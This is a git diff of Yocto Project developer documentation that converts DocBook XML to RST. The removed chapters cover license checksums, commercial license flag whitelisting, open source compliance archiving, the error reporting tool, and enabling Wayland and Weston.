- <title>Explanation of Syntax</title>
-
- <para>
- As mentioned in the previous section, the
- <filename>LIC_FILES_CHKSUM</filename> variable lists all
- the important files that contain the license text for the
- source code.
- It is possible to specify a checksum for an entire file,
- or a specific section of a file (specified by beginning and
- ending line numbers with the "beginline" and "endline"
- parameters, respectively).
- The latter is useful for source files with a license
- notice header, README documents, and so forth.
- If you do not use the "beginline" parameter, then it is
- assumed that the text begins on the first line of the file.
- Similarly, if you do not use the "endline" parameter,
- it is assumed that the license text ends with the last
- line of the file.
- </para>
-
- <para>
- The "md5" parameter stores the md5 checksum of the license
- text.
- If the license text changes in any way as compared to
- this parameter then a mismatch occurs.
- This mismatch triggers a build failure and notifies
- the developer.
- Notification allows the developer to review and address
- the license text changes.
- Also note that if a mismatch occurs during the build,
- the correct md5 checksum is placed in the build log and
- can be easily copied to the recipe.
- </para>
-
- <para>
- There is no limit to how many files you can specify using
- the <filename>LIC_FILES_CHKSUM</filename> variable.
- Generally, however, every project requires a few
- specifications for license tracking.
- Many projects have a "COPYING" file that stores the
- license information for all the source code files.
- This practice allows you to just track the "COPYING"
- file as long as it is kept up to date.
- <note><title>Tips</title>
- <itemizedlist>
- <listitem><para>
- If you specify an empty or invalid "md5"
- parameter,
- <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>
- returns an md5 mis-match
- error and displays the correct "md5" parameter
- value during the build.
- The correct parameter is also captured in
- the build log.
- </para></listitem>
- <listitem><para>
- If the whole file contains only license text,
- you do not need to use the "beginline" and
- "endline" parameters.
- </para></listitem>
- </itemizedlist>
- </note>
- </para>
- </section>
- </section>
-
- <section id="enabling-commercially-licensed-recipes">
- <title>Enabling Commercially Licensed Recipes</title>
-
- <para>
- By default, the OpenEmbedded build system disables
- components that have commercial or other special licensing
- requirements.
- Such requirements are defined on a
- recipe-by-recipe basis through the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE_FLAGS'><filename>LICENSE_FLAGS</filename></ulink>
- variable definition in the affected recipe.
- For instance, the
- <filename>poky/meta/recipes-multimedia/gstreamer/gst-plugins-ugly</filename>
- recipe contains the following statement:
- <literallayout class='monospaced'>
- LICENSE_FLAGS = "commercial"
- </literallayout>
- Here is a slightly more complicated example that contains both
- an explicit recipe name and version (after variable expansion):
- <literallayout class='monospaced'>
- LICENSE_FLAGS = "license_${PN}_${PV}"
- </literallayout>
- In order for a component restricted by a
- <filename>LICENSE_FLAGS</filename> definition to be enabled and
- included in an image, it needs to have a matching entry in the
- global
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE_FLAGS_WHITELIST'><filename>LICENSE_FLAGS_WHITELIST</filename></ulink>
- variable, which is a variable typically defined in your
- <filename>local.conf</filename> file.
- For example, to enable the
- <filename>poky/meta/recipes-multimedia/gstreamer/gst-plugins-ugly</filename>
- package, you could add either the string
- "commercial_gst-plugins-ugly" or the more general string
- "commercial" to <filename>LICENSE_FLAGS_WHITELIST</filename>.
- See the
- "<link linkend='license-flag-matching'>License Flag Matching</link>"
- section for a full
- explanation of how <filename>LICENSE_FLAGS</filename> matching
- works.
- Here is the example:
- <literallayout class='monospaced'>
- LICENSE_FLAGS_WHITELIST = "commercial_gst-plugins-ugly"
- </literallayout>
- Likewise, to additionally enable the package built from the
- recipe containing
- <filename>LICENSE_FLAGS = "license_${PN}_${PV}"</filename>,
- and assuming that the actual recipe name was
- <filename>emgd_1.10.bb</filename>, the following string would
- enable that package as well as the original
- <filename>gst-plugins-ugly</filename> package:
- <literallayout class='monospaced'>
- LICENSE_FLAGS_WHITELIST = "commercial_gst-plugins-ugly license_emgd_1.10"
- </literallayout>
- As a convenience, you do not need to specify the complete
- license string in the whitelist for every package.
- You can use an abbreviated form, which consists
- of just the first portion or portions of the license
- string before the initial underscore character or characters.
- A partial string will match any license that contains the
- given string as the first portion of its license.
- For example, the following whitelist string will also match
- both of the packages previously mentioned as well as any other
- packages that have licenses starting with "commercial" or
- "license".
- <literallayout class='monospaced'>
- LICENSE_FLAGS_WHITELIST = "commercial license"
- </literallayout>
- </para>
-
- <section id="license-flag-matching">
- <title>License Flag Matching</title>
-
- <para>
- License flag matching allows you to control what recipes
- the OpenEmbedded build system includes in the build.
- Fundamentally, the build system attempts to match
- <filename>LICENSE_FLAGS</filename> strings found in recipes
- against <filename>LICENSE_FLAGS_WHITELIST</filename>
- strings found in the whitelist.
- A match causes the build system to include a recipe in the
- build, while failure to find a match causes the build
- system to exclude a recipe.
- </para>
-
- <para>
- In general, license flag matching is simple.
- However, understanding some concepts will help you
- correctly and effectively use matching.
- </para>
-
- <para>
- Before a flag
- defined by a particular recipe is tested against the
- contents of the whitelist, the expanded string
- <filename>_${PN}</filename> is appended to the flag.
- This expansion makes each
- <filename>LICENSE_FLAGS</filename> value recipe-specific.
- After expansion, the string is then matched against the
- whitelist.
- Thus, specifying
- <filename>LICENSE_FLAGS = "commercial"</filename>
- in recipe "foo", for example, results in the string
- <filename>"commercial_foo"</filename>.
- And, to create a match, that string must appear in the
- whitelist.
- </para>
-
- <para>
- Judicious use of the <filename>LICENSE_FLAGS</filename>
- strings and the contents of the
- <filename>LICENSE_FLAGS_WHITELIST</filename> variable
- allows you a lot of flexibility for including or excluding
- recipes based on licensing.
- For example, you can broaden the matching capabilities by
- using license flags string subsets in the whitelist.
- <note>
- When using a string subset, be sure to use the part of
- the expanded string that precedes the appended
- underscore character (e.g.
- <filename>usethispart_1.3</filename>,
- <filename>usethispart_1.4</filename>, and so forth).
- </note>
- For example, simply specifying the string "commercial" in
- the whitelist matches any expanded
- <filename>LICENSE_FLAGS</filename> definition that starts
- with the string "commercial" such as "commercial_foo" and
- "commercial_bar", which are the strings the build system
- automatically generates for hypothetical recipes named
- "foo" and "bar" assuming those recipes simply specify the
- following:
- <literallayout class='monospaced'>
- LICENSE_FLAGS = "commercial"
- </literallayout>
- Thus, you can choose to exhaustively
- enumerate each license flag in the whitelist and
- allow only specific recipes into the image, or
- you can use a string subset that causes a broader range of
- matches to allow a range of recipes into the image.
- </para>
-
- <para>
- This scheme works even if the
- <filename>LICENSE_FLAGS</filename> string already
- has <filename>_${PN}</filename> appended.
- For example, the build system turns the license flag
- "commercial_1.2_foo" into "commercial_1.2_foo_foo" and
- would match both the general "commercial" and the specific
- "commercial_1.2_foo" strings found in the whitelist, as
- expected.
- </para>
-
- <para>
- Here are some other scenarios:
- <itemizedlist>
- <listitem><para>
- You can specify a versioned string in the recipe
- such as "commercial_foo_1.2" in a "foo" recipe.
- The build system expands this string to
- "commercial_foo_1.2_foo".
- Combine this license flag with a whitelist that has
- the string "commercial" and you match the flag
- along with any other flag that starts with the
- string "commercial".
- </para></listitem>
- <listitem><para>
- Under the same circumstances, you can use
- "commercial_foo" in the whitelist and the build
- system not only matches "commercial_foo_1.2" but
- also matches any license flag with the string
- "commercial_foo", regardless of the version.
- </para></listitem>
- <listitem><para>
- You can be very specific and use both the
- package and version parts in the whitelist (e.g.
- "commercial_foo_1.2") to specifically match a
- versioned recipe.
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id="other-variables-related-to-commercial-licenses">
- <title>Other Variables Related to Commercial Licenses</title>
-
- <para>
- Other helpful variables related to commercial
- license handling exist and are defined in the
- <filename>poky/meta/conf/distro/include/default-distrovars.inc</filename> file:
- <literallayout class='monospaced'>
- COMMERCIAL_AUDIO_PLUGINS ?= ""
- COMMERCIAL_VIDEO_PLUGINS ?= ""
- </literallayout>
- If you want to enable these components, you can do so by
- making sure you have statements similar to the following
- in your <filename>local.conf</filename> configuration file:
- <literallayout class='monospaced'>
- COMMERCIAL_AUDIO_PLUGINS = "gst-plugins-ugly-mad \
- gst-plugins-ugly-mpegaudioparse"
- COMMERCIAL_VIDEO_PLUGINS = "gst-plugins-ugly-mpeg2dec \
- gst-plugins-ugly-mpegstream gst-plugins-bad-mpegvideoparse"
- LICENSE_FLAGS_WHITELIST = "commercial_gst-plugins-ugly commercial_gst-plugins-bad commercial_qmmp"
- </literallayout>
- Of course, you could also create a matching whitelist
- for those components using the more general "commercial"
- in the whitelist, but that would also enable all the
- other packages with <filename>LICENSE_FLAGS</filename>
- containing "commercial", which you may or may not want:
- <literallayout class='monospaced'>
- LICENSE_FLAGS_WHITELIST = "commercial"
- </literallayout>
- </para>
-
- <para>
- Specifying audio and video plugins as part of the
- <filename>COMMERCIAL_AUDIO_PLUGINS</filename> and
- <filename>COMMERCIAL_VIDEO_PLUGINS</filename> statements
- (along with the enabling
- <filename>LICENSE_FLAGS_WHITELIST</filename>) includes the
- plugins or components into built images, thus adding
- support for media formats or components.
- </para>
- </section>
- </section>
-
- <section id='maintaining-open-source-license-compliance-during-your-products-lifecycle'>
- <title>Maintaining Open Source License Compliance During Your Product's Lifecycle</title>
-
- <para>
- One of the concerns for a development organization using open source
- software is how to maintain compliance with various open source
- licensing during the lifecycle of the product.
- While this section does not provide legal advice or
- comprehensively cover all scenarios, it does
- present methods that you can use to
- assist you in meeting the compliance requirements during a software
- release.
- </para>
-
- <para>
- With hundreds of different open source licenses that the Yocto
- Project tracks, it is difficult to know the requirements of each
- and every license.
- However, the requirements of the major FLOSS licenses can begin
- to be covered by
- assuming that three main areas of concern exist:
- <itemizedlist>
- <listitem><para>Source code must be provided.</para></listitem>
- <listitem><para>License text for the software must be
- provided.</para></listitem>
- <listitem><para>Compilation scripts and modifications to the
- source code must be provided.
- </para></listitem>
- </itemizedlist>
- There are other requirements beyond the scope of these
- three and the methods described in this section
- (e.g. the mechanism through which source code is distributed).
- </para>
-
- <para>
- As different organizations have different methods of complying with
- open source licensing, this section is not meant to imply that
- there is only one single way to meet your compliance obligations,
- but rather to describe one method of achieving compliance.
- The remainder of this section describes methods supported to meet the
- previously mentioned three requirements.
- Once you take steps to meet these requirements,
- and prior to releasing images, sources, and the build system,
- you should audit all artifacts to ensure completeness.
- <note>
- The Yocto Project generates a license manifest during
- image creation that is located
- in <filename>${DEPLOY_DIR}/licenses/<replaceable>image_name-datestamp</replaceable></filename>
- to assist with any audits.
- </note>
- </para>
-
- <section id='providing-the-source-code'>
- <title>Providing the Source Code</title>
-
- <para>
- Compliance activities should begin before you generate the
- final image.
- The first thing you should look at is the requirement that
- tops the list for most compliance groups - providing
- the source.
- The Yocto Project has a few ways of meeting this
- requirement.
- </para>
-
- <para>
- One of the easiest ways to meet this requirement is
- to provide the entire
- <ulink url='&YOCTO_DOCS_REF_URL;#var-DL_DIR'><filename>DL_DIR</filename></ulink>
- used by the build.
- This method, however, has a few issues.
- The most obvious is the size of the directory since it includes
- all sources used in the build and not just the source used in
- the released image.
- It will include toolchain source, and other artifacts, which
- you would not generally release.
- However, the more serious issue for most companies is accidental
- release of proprietary software.
- The Yocto Project provides an
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-archiver'><filename>archiver</filename></ulink>
- class to help avoid some of these concerns.
- </para>
-
- <para>
- Before you employ <filename>DL_DIR</filename> or the
- <filename>archiver</filename> class, you need to decide how
- you choose to provide source.
- The source <filename>archiver</filename> class can generate
- tarballs and SRPMs and can create them with various levels of
- compliance in mind.
- </para>
-
- <para>
- One way of doing this (but certainly not the only way) is to
- release just the source as a tarball.
- You can do this by adding the following to the
- <filename>local.conf</filename> file found in the
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>:
- <literallayout class='monospaced'>
- INHERIT += "archiver"
- ARCHIVER_MODE[src] = "original"
- </literallayout>
- During the creation of your image, the source from all
- recipes that deploy packages to the image is placed within
- subdirectories of
- <filename>DEPLOY_DIR/sources</filename> based on the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE'><filename>LICENSE</filename></ulink>
- for each recipe.
- Releasing the entire directory enables you to comply with
- requirements concerning providing the unmodified source.
- It is important to note that the size of the directory can
- get large.
- </para>
-
- <para>
- A way to help mitigate the size issue is to only release
- tarballs for licenses that require the release of
- source.
- Let us assume you are only concerned with GPL code as
- identified by running the following script:
- <literallayout class='monospaced'>
- # Script to archive a subset of packages matching specific license(s)
- # Source and license files are copied into sub folders of package folder
- # Must be run from build folder
- #!/bin/bash
- src_release_dir="source-release"
- mkdir -p $src_release_dir
- for a in tmp/deploy/sources/*; do
- for d in $a/*; do
- # Get package name from path
- p=`basename $d`
- p=${p%-*}
- p=${p%-*}
- # Only archive GPL packages (update *GPL* regex for your license check)
- numfiles=`ls tmp/deploy/licenses/$p/*GPL* 2> /dev/null | wc -l`
- if [ $numfiles -gt 1 ]; then
- echo Archiving $p
- mkdir -p $src_release_dir/$p/source
- cp $d/* $src_release_dir/$p/source 2> /dev/null
- mkdir -p $src_release_dir/$p/license
- cp tmp/deploy/licenses/$p/* $src_release_dir/$p/license 2> /dev/null
- fi
- done
- done
- </literallayout>
- At this point, you could create a tarball from the
- <filename>gpl_source_release</filename> directory and
- provide that to the end user.
- This method would be a step toward achieving compliance
- with section 3a of GPLv2 and with section 6 of GPLv3.
- </para>
- </section>
-
- <section id='providing-license-text'>
- <title>Providing License Text</title>
-
- <para>
- One requirement that is often overlooked is inclusion
- of license text.
- This requirement also needs to be dealt with prior to
- generating the final image.
- Some licenses require the license text to accompany
- the binary.
- You can achieve this by adding the following to your
- <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- COPY_LIC_MANIFEST = "1"
- COPY_LIC_DIRS = "1"
- LICENSE_CREATE_PACKAGE = "1"
- </literallayout>
- Adding these statements to the configuration file ensures
- that the licenses collected during package generation
- are included on your image.
- <note>
- <para>Setting all three variables to "1" results in the
- image having two copies of the same license file.
- One copy resides in
- <filename>/usr/share/common-licenses</filename> and
- the other resides in
- <filename>/usr/share/license</filename>.</para>
-
- <para>The reason for this behavior is because
- <ulink url='&YOCTO_DOCS_REF_URL;#var-COPY_LIC_DIRS'><filename>COPY_LIC_DIRS</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-COPY_LIC_MANIFEST'><filename>COPY_LIC_MANIFEST</filename></ulink>
- add a copy of the license when the image is built but do
- not offer a path for adding licenses for newly installed
- packages to an image.
- <ulink url='&YOCTO_DOCS_REF_URL;#var-LICENSE_CREATE_PACKAGE'><filename>LICENSE_CREATE_PACKAGE</filename></ulink>
- adds a separate package and an upgrade path for adding
- licenses to an image.</para>
- </note>
- </para>
-
- <para>
- As the source <filename>archiver</filename> class has already
- archived the original
- unmodified source that contains the license files,
- you would have already met the requirements for inclusion
- of the license information with source as defined by the GPL
- and other open source licenses.
- </para>
- </section>
-
- <section id='providing-compilation-scripts-and-source-code-modifications'>
- <title>Providing Compilation Scripts and Source Code Modifications</title>
-
- <para>
- At this point, we have addressed all we need to
- prior to generating the image.
- The next two requirements are addressed during the final
- packaging of the release.
- </para>
-
- <para>
- By releasing the version of the OpenEmbedded build system
- and the layers used during the build, you will be providing both
- compilation scripts and the source code modifications in one
- step.
- </para>
-
- <para>
- If the deployment team has a
- <ulink url='&YOCTO_DOCS_BSP_URL;#bsp-layers'>BSP layer</ulink>
- and a distro layer, and those those layers are used to patch,
- compile, package, or modify (in any way) any open source
- software included in your released images, you
- might be required to release those layers under section 3 of
- GPLv2 or section 1 of GPLv3.
- One way of doing that is with a clean
- checkout of the version of the Yocto Project and layers used
- during your build.
- Here is an example:
- <literallayout class='monospaced'>
- # We built using the &DISTRO_NAME_NO_CAP; branch of the poky repo
- $ git clone -b &DISTRO_NAME_NO_CAP; git://git.yoctoproject.org/poky
- $ cd poky
- # We built using the release_branch for our layers
- $ git clone -b release_branch git://git.mycompany.com/meta-my-bsp-layer
- $ git clone -b release_branch git://git.mycompany.com/meta-my-software-layer
- # clean up the .git repos
- $ find . -name ".git" -type d -exec rm -rf {} \;
- </literallayout>
- One thing a development organization might want to consider
- for end-user convenience is to modify
- <filename>meta-poky/conf/bblayers.conf.sample</filename> to
- ensure that when the end user utilizes the released build
- system to build an image, the development organization's
- layers are included in the <filename>bblayers.conf</filename>
- file automatically:
- <literallayout class='monospaced'>
- # POKY_BBLAYERS_CONF_VERSION is increased each time build/conf/bblayers.conf
- # changes incompatibly
- POKY_BBLAYERS_CONF_VERSION = "2"
-
- BBPATH = "${TOPDIR}"
- BBFILES ?= ""
-
- BBLAYERS ?= " \
- ##OEROOT##/meta \
- ##OEROOT##/meta-poky \
- ##OEROOT##/meta-yocto-bsp \
- ##OEROOT##/meta-mylayer \
- "
- </literallayout>
- Creating and providing an archive of the
- <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink>
- layers (recipes, configuration files, and so forth)
- enables you to meet your
- requirements to include the scripts to control compilation
- as well as any modifications to the original source.
- </para>
- </section>
- </section>
-
- <section id='copying-licenses-that-do-not-exist'>
- <title>Copying Licenses that Do Not Exist</title>
-
- <para>
- Some packages, such as the linux-firmware package, have many
- licenses that are not in any way common.
- You can avoid adding a lot of these types of common license
- files, which are only applicable to a specific package, by using
- the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-NO_GENERIC_LICENSE'><filename>NO_GENERIC_LICENSE</filename></ulink>
- variable.
- Using this variable also avoids QA errors when you use a
- non-common, non-CLOSED license in a recipe.
- </para>
-
- <para>
- The following is an example that uses the
- <filename>LICENSE.Abilis.txt</filename>
- file as the license from the fetched source:
- <literallayout class='monospaced'>
- NO_GENERIC_LICENSE[Firmware-Abilis] = "LICENSE.Abilis.txt"
- </literallayout>
- </para>
- </section>
- </section>
-
- <section id='using-the-error-reporting-tool'>
- <title>Using the Error Reporting Tool</title>
-
- <para>
- The error reporting tool allows you to
- submit errors encountered during builds to a central database.
- Outside of the build environment, you can use a web interface to
- browse errors, view statistics, and query for errors.
- The tool works using a client-server system where the client
- portion is integrated with the installed Yocto Project
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- (e.g. <filename>poky</filename>).
- The server receives the information collected and saves it in a
- database.
- </para>
-
- <para>
- A live instance of the error reporting server exists at
- <ulink url='http://errors.yoctoproject.org'></ulink>.
- This server exists so that when you want to get help with
- build failures, you can submit all of the information on the
- failure easily and then point to the URL in your bug report
- or send an email to the mailing list.
- <note>
- If you send error reports to this server, the reports become
- publicly visible.
- </note>
- </para>
-
- <section id='enabling-and-using-the-tool'>
- <title>Enabling and Using the Tool</title>
-
- <para>
- By default, the error reporting tool is disabled.
- You can enable it by inheriting the
- <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-report-error'><filename>report-error</filename></ulink>
- class by adding the following statement to the end of
- your <filename>local.conf</filename> file in your
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
- <literallayout class='monospaced'>
- INHERIT += "report-error"
- </literallayout>
- </para>
-
- <para>
- By default, the error reporting feature stores information in
- <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-LOG_DIR'><filename>LOG_DIR</filename></ulink><filename>}/error-report</filename>.
- However, you can specify a directory to use by adding the following
- to your <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- ERR_REPORT_DIR = "path"
- </literallayout>
- Enabling error reporting causes the build process to collect
- the errors and store them in a file as previously described.
- When the build system encounters an error, it includes a
- command as part of the console output.
- You can run the command to send the error file to the server.
- For example, the following command sends the errors to an
- upstream server:
- <literallayout class='monospaced'>
- $ send-error-report /home/brandusa/project/poky/build/tmp/log/error-report/error_report_201403141617.txt
- </literallayout>
- In the previous example, the errors are sent to a public
- database available at
- <ulink url='http://errors.yoctoproject.org'></ulink>, which is
- used by the entire community.
- If you specify a particular server, you can send the errors
- to a different database.
- Use the following command for more information on available
- options:
- <literallayout class='monospaced'>
- $ send-error-report --help
- </literallayout>
- </para>
-
- <para>
- When sending the error file, you are prompted to review the
- data being sent as well as to provide a name and optional
- email address.
- Once you satisfy these prompts, the command returns a link
- from the server that corresponds to your entry in the database.
- For example, here is a typical link:
- <literallayout class='monospaced'>
- http://errors.yoctoproject.org/Errors/Details/9522/
- </literallayout>
- Following the link takes you to a web interface where you can
- browse, query the errors, and view statistics.
- </para>
- </section>
-
- <section id='disabling-the-tool'>
- <title>Disabling the Tool</title>
-
- <para>
- To disable the error reporting feature, simply remove or comment
- out the following statement from the end of your
- <filename>local.conf</filename> file in your
- <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>.
- <literallayout class='monospaced'>
- INHERIT += "report-error"
- </literallayout>
- </para>
- </section>
-
- <section id='setting-up-your-own-error-reporting-server'>
- <title>Setting Up Your Own Error Reporting Server</title>
-
- <para>
- If you want to set up your own error reporting server, you
- can obtain the code from the Git repository at
- <ulink url='http://git.yoctoproject.org/cgit/cgit.cgi/error-report-web/'></ulink>.
- Instructions on how to set it up are in the README document.
- </para>
- </section>
- </section>
-
- <section id="dev-using-wayland-and-weston">
- <title>Using Wayland and Weston</title>
-
- <para>
- <ulink url='http://en.wikipedia.org/wiki/Wayland_(display_server_protocol)'>Wayland</ulink>
- is a computer display server protocol that
- provides a method for compositing window managers to communicate
- directly with applications and video hardware and expects them to
- communicate with input hardware using other libraries.
- Using Wayland with supporting targets can result in better control
- over graphics frame rendering than an application might otherwise
- achieve.
- </para>
-
- <para>
- The Yocto Project provides the Wayland protocol libraries and the
- reference
- <ulink url='http://en.wikipedia.org/wiki/Wayland_(display_server_protocol)#Weston'>Weston</ulink>
- compositor as part of its release.
- You can find the integrated packages in the
- <filename>meta</filename> layer of the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
- Specifically, you can find the recipes that build both Wayland
- and Weston at <filename>meta/recipes-graphics/wayland</filename>.
- </para>
-
- <para>
- You can build both the Wayland and Weston packages for use only
- with targets that accept the
- <ulink url='https://en.wikipedia.org/wiki/Mesa_(computer_graphics)'>Mesa 3D and Direct Rendering Infrastructure</ulink>,
- which is also known as Mesa DRI.
- This implies that you cannot build and use the packages if your
- target uses, for example, the
- <trademark class='registered'>Intel</trademark> Embedded Media
- and Graphics Driver
- (<trademark class='registered'>Intel</trademark> EMGD) that
- overrides Mesa DRI.
- <note>
- Due to lack of EGL support, Weston 1.0.3 will not run
- directly on the emulated QEMU hardware.
- However, this version of Weston will run under X emulation
- without issues.
- </note>
- </para>
-
- <para>
- This section describes what you need to do to implement Wayland and
- use the Weston compositor when building an image for a supporting
- target.
- </para>
-
- <section id="enabling-wayland-in-an-image">
- <title>Enabling Wayland in an Image</title>
-
- <para>
- To enable Wayland, you need to enable it to be built and enable
- it to be included (installed) in the image.
- </para>
-
- <section id="enable-building">
- <title>Building</title>
-
- <para>
- To cause Mesa to build the <filename>wayland-egl</filename>
- platform and Weston to build Wayland with Kernel Mode
- Setting
- (<ulink url='https://wiki.archlinux.org/index.php/Kernel_Mode_Setting'>KMS</ulink>)
- support, include the "wayland" flag in the
- <ulink url="&YOCTO_DOCS_REF_URL;#var-DISTRO_FEATURES"><filename>DISTRO_FEATURES</filename></ulink>
- statement in your <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- DISTRO_FEATURES_append = " wayland"
- </literallayout>
- <note>
- If X11 has been enabled elsewhere, Weston will build
- Wayland with X11 support
- </note>
- </para>
- </section>
-
- <section id="enable-installation-in-an-image">
- <title>Installing</title>
-
- <para>
- To install the Wayland feature into an image, you must
- include the following
- <ulink url='&YOCTO_DOCS_REF_URL;#var-CORE_IMAGE_EXTRA_INSTALL'><filename>CORE_IMAGE_EXTRA_INSTALL</filename></ulink>
- statement in your <filename>local.conf</filename> file:
- <literallayout class='monospaced'>
- CORE_IMAGE_EXTRA_INSTALL += "wayland weston"
- </literallayout>
- </para>
- </section>
- </section>
-
- <section id="running-weston">
- <title>Running Weston</title>
-
- <para>
- To run Weston inside X11, enabling it as described earlier and
- building a Sato image is sufficient.
- If you are running your image under Sato, a Weston Launcher
- appears in the "Utility" category.
- </para>
-
- <para>
- Alternatively, you can run Weston through the command-line
- interpretor (CLI), which is better suited for development work.
- To run Weston under the CLI, you need to do the following after
- your image is built:
- <orderedlist>
- <listitem><para>
- Run these commands to export
- <filename>XDG_RUNTIME_DIR</filename>:
- <literallayout class='monospaced'>
- mkdir -p /tmp/$USER-weston
- chmod 0700 /tmp/$USER-weston
- export XDG_RUNTIME_DIR=/tmp/$USER-weston
- </literallayout>
- </para></listitem>
- <listitem><para>
- Launch Weston in the shell:
- <literallayout class='monospaced'>
- weston
- </literallayout></para></listitem>
- </orderedlist>
- </para>
- </section>
- </section>
-</chapter>
-
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/dev-manual/dev-manual-customization.xsl b/documentation/dev-manual/dev-manual-customization.xsl
deleted file mode 100644
index 523ea3c5ed..0000000000
--- a/documentation/dev-manual/dev-manual-customization.xsl
+++ /dev/null
@@ -1,27 +0,0 @@
-<?xml version='1.0'?>
-<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns="http://www.w3.org/1999/xhtml" xmlns:fo="http://www.w3.org/1999/XSL/Format" version="1.0">
-
- <xsl:import href="http://downloads.yoctoproject.org/mirror/docbook-mirror/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
-<!--
-
- <xsl:import href="../template/1.76.1/docbook-xsl-1.76.1/xhtml/docbook.xsl" />
-
- <xsl:import href="http://docbook.sourceforge.net/release/xsl/1.76.1/xhtml/docbook.xsl" />
-
--->
-
- <xsl:include href="../template/permalinks.xsl"/>
- <xsl:include href="../template/section.title.xsl"/>
- <xsl:include href="../template/component.title.xsl"/>
- <xsl:include href="../template/division.title.xsl"/>
- <xsl:include href="../template/formal.object.heading.xsl"/>
-
- <xsl:param name="html.stylesheet" select="'dev-style.css'" />
- <xsl:param name="chapter.autolabel" select="1" />
- <xsl:param name="appendix.autolabel" select="A" />
- <xsl:param name="section.autolabel" select="1" />
- <xsl:param name="section.label.includes.component.label" select="1" />
- <xsl:param name="generate.id.attributes" select="1" />
-
-</xsl:stylesheet>
diff --git a/documentation/dev-manual/dev-manual-intro.rst b/documentation/dev-manual/dev-manual-intro.rst
new file mode 100644
index 0000000000..05136f7353
--- /dev/null
+++ b/documentation/dev-manual/dev-manual-intro.rst
@@ -0,0 +1,61 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+******************************************
+The Yocto Project Development Tasks Manual
+******************************************
+
+.. _dev-welcome:
+
+Welcome
+=======
+
+Welcome to the Yocto Project Development Tasks Manual! This manual
+provides relevant procedures necessary for developing in the Yocto
+Project environment (i.e. developing embedded Linux images and
+user-space applications that run on targeted devices). The manual groups
+related procedures into higher-level sections. Procedures can consist of
+high-level steps or low-level steps depending on the topic.
+
+This manual provides the following:
+
+- Procedures that help you get going with the Yocto Project. For
+ example, procedures that show you how to set up a build host and work
+ with the Yocto Project source repositories.
+
+- Procedures that show you how to submit changes to the Yocto Project.
+ Changes can be improvements, new features, or bug fixes.
+
+- Procedures related to "everyday" tasks you perform while developing
+ images and applications using the Yocto Project. For example,
+ procedures to create a layer, customize an image, write a new recipe,
+ and so forth.
+
+This manual does not provide the following:
+
+- Redundant Step-by-step Instructions: For example, the
+ :doc:`../sdk-manual/sdk-manual` manual contains detailed
+ instructions on how to install an SDK, which is used to develop
+ applications for target hardware.
+
+- Reference or Conceptual Material: This type of material resides in an
+ appropriate reference manual. For example, system variables are
+ documented in the :doc:`../ref-manual/ref-manual`.
+
+- Detailed Public Information Not Specific to the Yocto Project: For
+ example, exhaustive information on how to use the Source Control
+ Manager Git is better covered with Internet searches and official Git
+ Documentation than through the Yocto Project documentation.
+
+Other Information
+=================
+
+Because this manual presents information for many different topics,
+supplemental information is recommended for full comprehension. For
+introductory information on the Yocto Project, see the
+:yocto_home:`Yocto Project Website <>`. If you want to build an image with no
+knowledge of Yocto Project as a way of quickly testing it out, see the
+:doc:`../brief-yoctoprojectqs/brief-yoctoprojectqs` document.
+
+For a comprehensive list of links and other documentation, see the
+":ref:`ref-manual/resources:links and related documentation`"
+section in the Yocto Project Reference Manual.
diff --git a/documentation/dev-manual/dev-manual-intro.xml b/documentation/dev-manual/dev-manual-intro.xml
deleted file mode 100644
index 3a34094b8c..0000000000
--- a/documentation/dev-manual/dev-manual-intro.xml
+++ /dev/null
@@ -1,103 +0,0 @@
-<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<chapter id='dev-manual-intro'>
-
-<title>The Yocto Project Development Tasks Manual</title>
- <section id='dev-welcome'>
- <title>Welcome</title>
-
- <para>
- Welcome to the Yocto Project Development Tasks Manual!
- This manual provides relevant procedures necessary for developing
- in the Yocto Project environment (i.e. developing embedded Linux
- images and user-space applications that run on targeted devices).
- The manual groups related procedures into higher-level sections.
- Procedures can consist of high-level steps or low-level steps
- depending on the topic.
- </para>
-
- <para>
- This manual provides the following:
- <itemizedlist>
- <listitem><para>
- Procedures that help you get going with the Yocto Project.
- For example, procedures that show you how to set up
- a build host and work with the Yocto Project
- source repositories.
- </para></listitem>
- <listitem><para>
- Procedures that show you how to submit changes to the
- Yocto Project.
- Changes can be improvements, new features, or bug
- fixes.
- </para></listitem>
- <listitem><para>
- Procedures related to "everyday" tasks you perform while
- developing images and applications using the Yocto
- Project.
- For example, procedures to create a layer, customize an
- image, write a new recipe, and so forth.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- This manual does not provide the following:
- <itemizedlist>
- <listitem><para>
- Redundant Step-by-step Instructions:
- For example, the
- <ulink url='&YOCTO_DOCS_SDK_URL;'>Yocto Project Application Development and the Extensible Software Development Kit (eSDK)</ulink>
- manual contains detailed instructions on how to install an
- SDK, which is used to develop applications for target
- hardware.
- </para></listitem>
- <listitem><para>
- Reference or Conceptual Material:
- This type of material resides in an appropriate reference
- manual.
